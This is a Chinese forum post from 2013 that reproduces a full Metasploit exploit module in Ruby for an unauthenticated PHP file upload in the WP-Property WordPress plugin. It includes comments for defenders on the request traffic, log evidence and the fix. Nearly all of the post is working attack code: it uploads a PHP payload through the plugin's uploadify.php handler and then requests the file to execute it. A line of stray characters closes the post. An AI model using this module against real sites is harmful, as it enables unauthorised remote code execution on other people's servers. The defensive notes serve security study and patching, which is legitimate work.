
WordPress WP-Property PHP 文件上传漏洞

发表于 2013-1-4 19:51:30
WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

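# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (the page names versions <= 1.35.0 as affected).
#
# Root cause, per the module description: the plugin ships a third-party
# upload handler (uploadify.php) that accepts a file without authentication
# and stores it under a web-served directory, so an uploaded .php file can
# then be requested and executed.
#
# Reviewer notes for defenders:
# - The traffic this module generates is a multipart POST to
#   .../wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   followed by a GET for the path echoed back in the response body.
# - The payload is requested with :unlink_self => true, which presumably
#   removes the uploaded file after it runs (inferred from the option name),
#   so web-server access logs are likely better evidence than the filesystem.
# - Removing or access-restricting the bundled handler and updating the
#   plugin past the affected range addresses the issue; confirm the fixed
#   release with the vendor, the page does not state it.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The forum copy shows "Msf::Exploit:hpEXE" here: the "::P" was swallowed by
  # the forum's emoticon rendering. get_write_exec_payload, used in #exploit,
  # comes from the PhpEXE mixin.
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, targets, payload constraints) and
  # the TARGETURI option that points at the WordPress installation root.
  #
  # @param info [Hash] metadata passed down by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the upload handler with a plain GET.
  #
  # This only establishes that the handler URL answers with HTTP 200. It does
  # not fingerprint the plugin version, so "Appears" can be reported for a
  # patched installation that still ships the file.
  #
  # @return [Exploit::CheckCode::Unknown] on no response or a non-200 status
  # @return [Exploit::CheckCode::Appears] when the handler URL returns 200
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uploadify_dir}uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a randomly named PHP payload through the handler and then
  # requests the location the handler reports back.
  #
  # Fails with Exploit::Failure::UnexpectedReply when the upload response is
  # missing, is not HTTP 200, or does not mention the uploaded file name.
  def exploit
    handler_dir = uploadify_dir
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Two form fields: the file itself and the "folder" the handler writes to.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part(handler_dir, nil, nil, "form-data; name=\"folder\"")
    # Strips the blank line Rex emits before each part boundary.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{handler_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The file name is alphabetic plus ".php", so a substring test matches
    # what the original regex interpolation matched in practice.
    unless res && res.code == 200 && res.body.to_s.include?(@payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The handler's response body is used verbatim as the stored file's path.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Builds the URI of the plugin's uploadify directory under TARGETURI.
  #
  # Works on a copy so the string returned by target_uri.path is not modified
  # in place (the original appended to it with <<).
  #
  # @return [String] directory URI ending in "/"
  def uploadify_dir
    base = target_uri.path.dup
    base << '/' unless base[-1, 1] == '/'
    "#{base}wp-content/plugins/wp-property/third-party/uploadify/"
  end
end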

" D3 b9 l6 M$ ~/ y. J不要问我这写的是什么 怎么利用 我是说msf.